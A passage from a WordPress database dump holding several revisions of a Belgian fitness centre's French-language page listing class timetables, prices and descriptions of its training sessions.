69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:38:00', '2013-07-03 17:38:00', '', 11, 'http://www.crosstrainingcenter.be/?p=189', 0, 'revision', '', 0),
(188, 1, '2013-07-03 17:35:03', '2013-07-03 17:35:03', '<h2>Team Training :</h2>\r\n<h4>En semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Le week-end :</h4>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td></td>\r\n<td>LUNDI</td>\r\n<td>MARDI</td>\r\n<td>MERCREDI</td>\r\n<td>JEUDI</td>\r\n<td>VENDREDI</td>\r\n</tr>\r\n<tr>\r\n<td>17h30</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr>\r\n<td>18h15</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n</tr>\r\n<tr>\r\n<td>19h00</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n</tr>\r\n<tr>\r\n<td>19h45</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:35:03', '2013-07-03 17:35:03', '', 11, 'http://www.crosstrainingcenter.be/?p=188', 0, 'revision', '', 0),
(190, 1, '2013-07-03 17:38:41', '2013-07-03 17:38:41', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:38:41', '2013-07-03 17:38:41', '', 11, 'http://www.crosstrainingcenter.be/?p=190', 0, 'revision', '', 0),
(191, 1, '2013-07-03 17:39:35', '2013-07-03 17:39:35', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 25%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 